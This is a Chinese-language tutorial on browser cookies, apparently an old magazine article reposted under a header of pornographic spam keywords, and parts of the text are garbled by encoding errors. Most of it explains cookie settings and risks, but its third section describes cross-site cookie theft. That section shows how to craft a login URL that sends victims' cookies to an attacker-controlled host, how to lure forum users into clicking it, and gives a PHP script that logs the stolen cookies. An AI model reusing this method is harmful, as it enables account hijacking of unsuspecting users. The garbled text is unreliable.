欧美性猛交XXXX免费看蜜桃,成人网18免费韩国,亚洲国产成人精品区综合,欧美日韩一区二区三区高清不卡,亚洲综合一区二区精品久久

　

　　一、了解Cookie 適用對象：初級讀者

　　Cookie是當你瀏覽某網(wǎng)站時(shí)，網(wǎng)站存儲在你機器上的一個(gè)小文本文件，它記錄了你的用戶(hù)ID，密碼、瀏覽過(guò)的網(wǎng)頁(yè)、停留的時(shí)間等信息，當你再次來(lái)到該網(wǎng)站時(shí)，網(wǎng)站通過(guò)讀取Cookie，得知你的相關(guān)信息，就可以做出相應的動(dòng)作，如在頁(yè)面顯示歡迎你的標語(yǔ)，或者讓你不用輸入ID、密碼就直接登錄等等。你可以在IE的“工具/Internet選項”的“常規”選項卡中，選擇“設置/查看文件”，查看所有保存到你電腦里的Cookie。這些文件通常是以user@domain格式命名的，user是你的本地用戶(hù)名，domain是所訪(fǎng)問(wèn)的網(wǎng)站的域名。如果你使用NetsCape瀏覽器，則存放在“C:\PROGRAMFILES\NETSCAPE\USERS\”里面，與IE不同的是，NETSCAPE是使用一個(gè)Cookie 文件記錄所有網(wǎng)站的Cookies。

　　為了保證上網(wǎng)安全我們需要對Cookie進(jìn)行適當設置。打開(kāi)“工具/Internet選項”中的“隱私”選項卡（注意該設置只在IE6.0中存在，其他版本IE可以在“工具/Internet選項”的“安全”標簽中單擊“自定義級別”按鈕，進(jìn)行簡(jiǎn)單調整），調整Cookie的安全級別。通常情況，可以將滑塊調整到“中高”或者“高”的位置。多數的論壇站點(diǎn)需要使用Cookie信息，如果你從來(lái)不去這些地方，可以將安全級調到“阻止所有Cookies”。如果只是為了禁止個(gè)別網(wǎng)站的Cookie，可以單擊“編輯”按鈕，將要屏蔽的網(wǎng)站添加到列表中。在“高級”按鈕選項中，你可以對第一方Cookie偷諶降腃ookie進(jìn)行設置，第一方Cookie是你正在瀏覽的網(wǎng)站的Cookie，第三方Cookie非正在瀏覽的網(wǎng)站發(fā)給你的Cookie，通常要對第三方Cookie選擇“拒絕”，如圖1。你如果需要保存Cookie，可以使用IE的“導入導出”功能，打開(kāi)“文件/導入導出”，按提示操作即可。

　　Cookie中的內容大多數經(jīng)過(guò)了加密處理，因此在我們看來(lái)只是一些毫無(wú)意義的字母數字組合，只有服務(wù)器的CGI處理程序才知道它們真正的含義。通過(guò)一些軟件我們可以查看到更多的內容，使用Cookie Pal軟件查看到的Cookie信息，如圖2所示。它為我們提供了Server、Expires、Name、Value等選項的內容。其中，Server是存儲Cookie的網(wǎng)站，Expires記錄了Cookie的時(shí)間和生命期，Name和value字段則是具體的數據（本報第10期第42版對該軟件有詳細介紹）。

　　二、Cookie的傳遞流程 適用對象：中級讀者

　　當在瀏覽器地址欄中鍵入了一個(gè)Web站點(diǎn)的URL，瀏覽器會(huì )向該Web站點(diǎn)發(fā)送一個(gè)讀取網(wǎng)頁(yè)的請求，并將結果在顯示器上顯示。這時(shí)該網(wǎng)頁(yè)在你的電腦上尋找Amazon網(wǎng)站設置的Cookie文件，如果找到，瀏覽器會(huì )把Cookie文件中的數據連同前面輸入的URL一同發(fā)送到Amazon服務(wù)器。服務(wù)器收到Cookie數據，就會(huì )在他的數據庫中檢索你的ID，你的購物記錄、個(gè)人喜好等信息，并記錄下新的內容，增加到數據庫和Cookie文件中去。如果沒(méi)有檢測到Cookie或者你的Cookie信息與數據庫中的信息不符合，則說(shuō)明你是第一次瀏覽該網(wǎng)站，服務(wù)器的CGI程序將為你創(chuàng )建新的ID信息，并保存到數據庫中。

　　Cookie是利用了網(wǎng)頁(yè)代碼中的HTTP頭信息進(jìn)行傳遞的，瀏覽器的每一次網(wǎng)頁(yè)請求，都可以伴隨Cookie傳遞，例如，瀏覽器的打開(kāi)或刷新網(wǎng)頁(yè)操作。服務(wù)器將Cookie添加到網(wǎng)頁(yè)的HTTP頭信息中，伴隨網(wǎng)頁(yè)數據傳回到你的瀏覽器，瀏覽器會(huì )根據你電腦中的Cookie設置選擇是否保存這些數據。如果瀏覽器不允許Cookie保存，則關(guān)掉瀏覽器后，這些數據就消失。Cookie在電腦上保存的時(shí)間是不一樣的，這些都是由服務(wù)器的設置不同決定得。Cookie有一個(gè)Expires（有效期）屬性，這個(gè)屬性決定了Cookie的保存時(shí)間，服務(wù)器可以通過(guò)設定Expires字段的數值，來(lái)改變Cookie的保存時(shí)間。如果不設置該屬性，那么Cookie只在瀏覽網(wǎng)頁(yè)期間有效，關(guān)閉瀏覽器，這些Cookie自動(dòng)消失，絕大多數網(wǎng)站屬于這種情況。通常情況下，Cookie包含Server、Expires、Name、Value這幾個(gè)字段，其中對服務(wù)器有用的只是Name和Value字段，Expires等字段的內容僅僅是為了告訴瀏覽器如何處理這些Cookies。

　　三、Cookie的編程實(shí)現 適用對象：高級讀者

　　多數網(wǎng)頁(yè)編程語(yǔ)言都提供了對Cookie的支持。如JavaScript、VBScript、Delphi、ASP、SQL、PHP、C#等。在這些面向對象的編程語(yǔ)言中，對Cookie的編程利用基本上是相似的，大體過(guò)程為：先創(chuàng )建一個(gè)Cookie對象（Object），然后利用控制函數對Cookie進(jìn)行賦值、讀取、寫(xiě)入等操作。那么如何通過(guò)代碼來(lái)獲取其他用戶(hù)Cookie中的敏感信息？下面進(jìn)行簡(jiǎn)單的介紹。

　　該方法主要有兩步，首先要定位你需要收集Cookie的網(wǎng)站，并對其進(jìn)行分析，并構造URL；然后編制收集Cookie的PHP代碼，并將其放到你可以控制的網(wǎng)站上，當不知情者單擊了你構造的URL后可以執行該PHP代碼。下面我們看具體的實(shí)現過(guò)程。

　　1.分析并構造URL

　　首先打開(kāi)我們要收集Cookie的網(wǎng)站，這里假設是http://www.XXX.net，登陸網(wǎng)站輸入用戶(hù)名“”（不含引號），對數據進(jìn)行分析抓包，得到形如“http://www.XXX.net/txl/login/login.pl?username=&passwd=&ok.x=28&ok.y=6”的代碼，將“”更換為“ ”再試；如果執行成功，就開(kāi)始構造URL：“http://www.XXX.net/txl/login/login.pl?username= &passwd=&ok.x=28&ok.y=6”。其中http:///www.cbifamily.org/cbi.php就是你能夠控制的某臺主機上的一個(gè)腳本。需要注意的是“%2B”為符號“+”的URL編碼，因為“+”將被作為空格處理。該URL就可以在論壇中發(fā)布，誘使別人點(diǎn)擊了。

　　2.編制PHP腳本

　　該腳本的作用就是收集Cookie文件，具體內容如下：

　　　　<>
　　　　$info = getenv("QUERY_STRING");
　　　　if ($info) {
　　　　$fp = fopen("info.txt","a");
　　 fwrite($fp,$info."\n");
　　 fclose($fp);
　　　　}
　　　　header("Location: http://www.XXX.net");
　　　　?>

　　四、Cookie的安全問(wèn)題 適用對象：所有希望上網(wǎng)安全的讀者

　　1.Cookie欺騙

　　Cookie記錄著(zhù)用戶(hù)的帳戶(hù)ID、密碼之類(lèi)的信息，如果在網(wǎng)上傳遞，通常使用的是MD5方法加密。這樣經(jīng)過(guò)加密處理后的信息，即使被網(wǎng)絡(luò )上一些別有用心的人截獲，也看不懂，因為他看到的只是一些無(wú)意義的字母和數字。然而，現在遇到的問(wèn)題是，截獲Cookie的人不需要知道這些字符串的含義，他們只要把別人的Cookie向服務(wù)器提交，并且能夠通過(guò)驗證，他們就可以冒充受害人的身份，登陸網(wǎng)站。這種方法叫做Cookie欺騙。Cookie欺騙實(shí)現的前提條件是服務(wù)器的驗證程序存在漏洞，并且冒充者要獲得被冒充的人的Cookie信息。目前網(wǎng)站的驗證程序要排除所有非法登錄是非常困難的，例如，編寫(xiě)驗證程序使用的語(yǔ)言可能存在漏洞。而且要獲得別人Cookie是很容易的，用支持Cookie的語(yǔ)言編寫(xiě)一小段代碼就可以實(shí)現（具體方法見(jiàn)三），只要把這段代碼放到網(wǎng)絡(luò )里，那么所有人的Cookie都能夠被收集。如果一個(gè)論壇允許HTML代碼或者允許使用Flash標簽就可以利用這些技術(shù)收集Cookie的代碼放到論壇里，然后給帖子取一個(gè)吸引人的主題，寫(xiě)上有趣的內容，很快就可以收集到大量的Cookie。在論壇上，有許多人的密碼就被這種方法盜去的。至于如何防范，目前還沒(méi)有特效藥，我們也只能使用通常的防護方法，不要在論壇里使用重要的密碼，也不要使用IE自動(dòng)保存密碼的功能，以及盡量不登陸不了解底細的網(wǎng)站。

　　2.Flash的代碼隱患

　　Flash中有一個(gè)getURL（）函數，Flash可以利用這個(gè)函數自動(dòng)打開(kāi)指定的網(wǎng)頁(yè)。因此它可能把你引向一個(gè)包含惡意代碼的網(wǎng)站。打個(gè)比方，當你在自己電腦上欣賞精美的Flash動(dòng)畫(huà)時(shí)，動(dòng)畫(huà)幀里的代碼可能已經(jīng)悄悄地連上網(wǎng)，并打開(kāi)了一個(gè)極小的包含有特殊代碼的頁(yè)面。這個(gè)頁(yè)面可以收集你的Cookie、也可以做一些其他的事情，比如在你的機器上種植木馬甚至格式化你的硬盤(pán)等等。對于Flash的這種行為，網(wǎng)站是無(wú)法禁止的，因為這是Flash文件的內部行為。我們所能做到的，如果是在本地瀏覽盡量打開(kāi)防火墻，如果防火墻提示的向外發(fā)送的數據包并不為你知悉，最好禁止。如果是在Internet上欣賞，最好找一些知名的大網(wǎng)站。